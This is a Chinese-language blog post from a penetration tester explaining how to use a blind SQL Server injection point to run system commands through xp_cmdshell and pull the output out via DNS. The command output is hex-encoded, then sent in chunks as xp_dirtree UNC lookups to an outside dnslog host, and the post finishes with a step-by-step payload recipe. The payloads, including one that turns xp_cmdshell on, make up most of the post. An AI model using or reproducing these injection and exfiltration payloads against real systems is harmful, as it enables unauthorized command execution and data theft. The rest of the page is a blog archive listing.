

c1ay's blog

记一次dnslog接收异常分析

c1ay's blog

记一次dnslog接收异常分析

渗透测试

字数统计: 1.5k阅读时长: 6 min

 2019/01/11   Share

• 
• 
• 
• 
• 

记一次dnslog接收异常分析

序

在一次渗透的过程中，遇到了sqlserver的注入点，在使用dnslog接收语句的执行结果时发现可以执行系统命令，但是在接收结果的时候遇到了些问题，问题如下

通过手工注入将命令执行结果发送至dnslog的语句如下：

;CREATE/**/TABLE/**/tt_tmp/**/(tmp1/**/varchar(8000));--
;DECLARE/**/@code/**/VARCHAR(8000);SET/**/@code=0x77686f616d69;insert/**/into/**/tt_tmp(tmp1)/**/exec/**/master..xp_cmdshell/**/@code;-- 
;declare @a char(128);set @a='\\'%2b(select master.dbo.fn_varbintohexstr(cast(cast((select top 1 tmp1 from tt_tmp) as char(255)) as VARBINARY)))%2b'.meomna.ceye.io\abc';exec master..xp_dirtree @a;--

以上语句用来执行whoami，然后使用dnslog接收命令执行的结果，结果如图

这几条语句大致的意思是首先创建一个临时表，之后使用xp_cmdshell这个存储过程去执行whoami并将命令执行的结果插入到这个临时表，然后查询临时表的内容并将查询结果通过xp_dirtree这个存储过程发送至dnslog，这里需要对结果进行16进制编码，因为UNC路径里不允许有一些特殊字符，至于为什么要使用这种方式呢，一是因为网站有防护，直接上sqlmap的话会被封ip影响渗透，二是因为该注入点只能通过盲注，布尔盲注和时间盲注的速度我就不说了，大家都懂的，通过结果可以看到可以成功的执行whoami，但是接下来问题就出现了，我在执行ipconfig的时候出现了意料之外的结果,首先需要获取命令执行结果的长度，因为在使用dnslog注入的时候，UNC路径的长度也有限制，不能超过128个字符，超出长度的话语句就会执行失败，语句如下

;drop/**/table/**/tt_tmp;-- 
;CREATE/**/TABLE/**/tt_tmp/**/(tmp1/**/varchar(8000));-- 
;DECLARE/**/@code/**/VARCHAR(8000);SET/**/@code=0x6970636f6e666967;insert/**/into/**/tt_tmp(tmp1)/**/exec/**/master..xp_cmdshell/**/@code;-- 
;declare @a char(128);set @a='\\'%2b(select cast(len(master.dbo.fn_varbintohexstr(cast(cast((select top 1 tmp1 from tt_tmp) as char(255)) as VARBINARY))) as char(32)))%2b'.meomna.ceye.io\abc';exec master..xp_dirtree @a;--

语句的作用首先删除临时表，执行ipconfig并将命令执行的结果插入临时表，接着查询结果并进行16进制编码，并且获取长度，结果如下

可以看到这里出现了一个奇怪的问题，获取到的长度仅仅为62字节，而ipconfig的输出肯定是比这个要长的，接下来把内容输出一下看看

;declare @a char(128);set @a='\\'%2b(select master.dbo.fn_varbintohexstr(cast(cast((select top 1 tmp1 from tt_tmp) as char(255)) as VARBINARY)))%2b'.meomna.ceye.io\abc';exec master..xp_dirtree @a;--

可以看到并没有报错，成功接收到了结果，但是可以看出全是空白字符，这里猜测命令的执行结果是多行的，但是这里只获取了第一行结果的长度和内容

本地分析测试一波：

CREATE/**/TABLE/**/tt_tmp/**/(tmp1/**/varchar(8000));-- 
DECLARE/**/@code/**/VARCHAR(8000);SET/**/@code=0x77686f616d69;insert/**/into/**/tt_tmp(tmp1)/**/exec/**/master..xp_cmdshell/**/@code;

报错说禁止访问xp_cmdshell,开启一下

EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;

现在可以了

重新插入，执行ipconfig

CREATE/**/TABLE/**/tt_tmp/**/(tmp1/**/varchar(8000));-- 
DECLARE/**/@code/**/VARCHAR(8000);SET/**/@code=0x6970636f6e666967;insert/**/into/**/tt_tmp(tmp1)/**/exec/**/master..xp_cmdshell/**/@code;

通过结果可以看到确实是这样子没错，在将命令的执行结果插入表中的时候遇到了换行符，所以将执行结果插入到了多行内,第一行为空字符

解决办法：

创建表的时候增加主键，之后逐行查询，修改后的语句如下

CREATE TABLE tt_tmp (id INT PRIMARY KEY IDENTITY,tmp1 nvarchar(4000));
DECLARE @code varchar(4000);SET @code=0x6970636f6e666967;insert into tt_tmp(tmp1) exec master..xp_cmdshell @code;
select master.dbo.fn_varbintohexstr(cast(cast((select tmp1 from tt_tmp where id=8) as char(255)) as VARBINARY));

再次查询一下经过16进制编码后的长度，发现长度依旧被截断到了 62字节,wtf!?

但是直接查询内容的话并没有发现内容被截断

说明截断发生在了16进制转换的过程中，分析了一波发现原来是由于转化为二进制的时候没有给VARBINARY设置长度，所以转化成二进制的时候使用的是默认长度而导致后面的内容被截断了，修改一下语句

select master.dbo.fn_varbintohexstr(cast(cast((select tmp1 from tt_tmp where id=8) as char(255)) as VARBINARY(4000)));

没有再发生截断问题

select cast(len(master.dbo.fn_varbintohexstr(cast(cast((select tmp1 from tt_tmp where id=8) as char(255)) as VARBINARY(4000)))) as char(32));

发现长度为512字节，后面多出的会由空格x20填充

之后通过一系列折腾，总结使用dnslog接收sqlserver执行命令结果的方法

第一步：创建临时表用于接收命令的执行结果，需要定义主键：

CREATE TABLE tt_tmp (id INT PRIMARY KEY IDENTITY,tmp1 nvarchar(4000));

第二步：将命令执行结果插入临时表：

DECLARE @code varchar(4000);SET @code=0x77686f616d69;insert into tt_tmp(tmp1) exec master..xp_cmdshell @code;

第三步：由于插入了多行，首先需要获取行数(经过测试部分版本的sqlserver在UNC查询结果的位置不能有空格，需要去除空格，使用rtrim)：

declare @a char(128);set @a='\\'+(select rtrim(cast(COUNT(*) as char(32))) from tt_tmp)+'.meomna.ceye.io\abc';exec master..xp_dirtree @a;

第四步：将查询结果发送至dnslog(逐行读取，截取字符串)

declare @a char(128);set @a='\\'%2b(select substring(master.dbo.fn_varbintohexstr(cast(cast((select tmp1 from tt_tmp where id=1) as char(255)) as VARBINARY(4000))),1,60))%2b'.meomna.ceye.io\abc';exec master..xp_dirtree @a;

每次截取60个字符，直到截取完512个字符为止

declare @a char(128);set @a='\\'%2b(select substring(master.dbo.fn_varbintohexstr(cast(cast((select tmp1 from tt_tmp where id=1) as char(255)) as VARBINARY(4000))),61,60))%2b'.meomna.ceye.io\abc';exec master..xp_dirtree @a;
...
...
总共截取9次，可以写脚本完成

1-60
61-120
121-180
181-240
241-300
301-360
361-420
421-480
481-512

第五步：删除临时表，用于接收下一次命令执行的结果

drop/**/table/**/tt_tmp;--

原文作者：c1ay

原文链接：https://c1aysec.github.io/2019/01/11/记一次dnslog接收异常分析/

发表日期：January 11th 2019, 4:08:50 pm

更新日期：November 8th 2019, 11:37:59 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  渗透技巧-使用dnslog加快盲注速度(MSSQL篇)
• Previous Post
  phpcms2008 type.php代码执行漏洞分析与复现

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. 记一次dnslog接收异常分析
   1. 1.0.1. 序



• Archive
• Tag
• Cate

Total : 63

2018

• 08/08记一次漏洞组合拳-水平越权+Self XSS漏洞

Invalid date

• Invalid dateRealWorld2022 RWDN复现总结

2021

• 11/192021 L3HCTF 部分web wp
• 10/19通过2021 ByteCTF double sqli初探clickghouse sqli
• 03/15Microsoft Exchange RCE
• 01/22weblogic cve-2021-2109 jndi注入 远程代码执行复现
• 01/22Seeyon-OA getshell漏洞复现和payload构造

2020

• 12/142020网鼎杯总决赛web题
• 12/072020全国电信和互联网行业网络安全竞赛wp
• 11/02weblogic cve-2020-14882 漏洞复现以及回显方式研究
• 10/192020 N1CTF writeup
• 08/312020GACTF writeup
• 08/242020强网杯writeup
• 08/18深信服EDR RCE分析
• 05/172020网鼎杯朱雀组-部分web
• 05/102020网鼎杯青龙组-php反序列化
• 04/22通达OA任意用户登录

2019

• 11/03ctf记录-记一次有趣的注入
• 10/202019极客巅峰ctf记录
• 05/282019强网杯-过滤select的注入
• 04/18DDCTF2019 write up
• 03/17渗透技巧-使用dnslog加快盲注速度(MSSQL篇)
• 01/11记一次dnslog接收异常分析

2018

• 12/21phpcms2008 type.php代码执行漏洞分析与复现
• 11/30Code-Breaking Puzzles挑战
• 11/192018湖湘杯注入题writeup
• 08/19记一次失败漏洞利用的经历--ubuntu下的redis未授权访问漏洞复现

Invalid date

• Invalid date2020宁波市第三届网络安全大赛-web题writeup

2018

• 10/26PHP反序列化漏洞学习-绕过_wakeup()函数
• 10/08记一次ctf极限利用-不包含数字字母的webshell
• 09/07Ecshop2.x注入漏洞&代码执行漏洞分析
• 09/02XSS绕过之中文尖括号
• 08/26ssrf漏洞学习记录
• 08/18关于ubuntu和centos cron的一些区别
• 08/17解决ubuntu任务计划写shell失败的问题
• 07/17Linux下几种反弹shell方法的总结与理解
• 06/30渗透技巧-使用dnslog加快盲注速度(MYSQL篇)
• 06/07upload-labs记录
• 06/06python布尔盲注脚本算法完善
• 06/05python编写布尔盲注脚本
• 06/05python optparse模块学习
• 06/04python有序二分查找算法学习
• 05/25ISCC2018 write up
• 05/13php parse_url()函数在解析url引发的绕过思路
• 03/12N1CTF2018 77777 writeup
• 01/12ARP协议分析以及用python实现一次ARP欺骗

Invalid date

• Invalid dateApache SkyWalking SQL注入漏洞-CVE-2020-13921

2017

• 11/26湖湘杯2017网络安全技能大赛部分题writeup
• 11/20lctf2017注入题学习记录
• 11/12mysql报错注入总结与原理分析

Invalid date

• Invalid datephp反序列化原生类

2017

• 11/05第三届上海市大学生网络安全大赛注入题writeup

Invalid date

• Invalid date2021 bilibili 1024挑战赛

Invalid date

• Invalid date2020全国电信和互联网行业网络安全竞赛线下个人赛wp

Invalid date

• Invalid date2021HW总结-网康NS-NGFW rce复现分析

Invalid date

• Invalid dateRealWorld2022-Hack into Skynet

Invalid date

• Invalid datectf记录记一次简单的命令执行绕过

Invalid date

• Invalid date2021 n1ctf 复盘

Invalid date

• Invalid date2020钓鱼城杯writeup

2017

• 11/03我的第一篇博客

Invalid date

• Invalid datephpweb前台任意文件上传

Invalid date

• Invalid dateshellcode-uuid免杀

Invalid date

• Invalid date2020网鼎杯半决赛web题

ctf 漏洞复现 漏洞分析 代码审计 漏洞挖掘 Hexo python 算法 免杀学习 Linux sql注入 渗透测试 反弹shell ssrf 文件上传



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

ctf 漏洞复现 漏洞分析 代码审计 web安全 漏洞挖掘 其他 python编程 免杀学习 Linux渗透 渗透测试

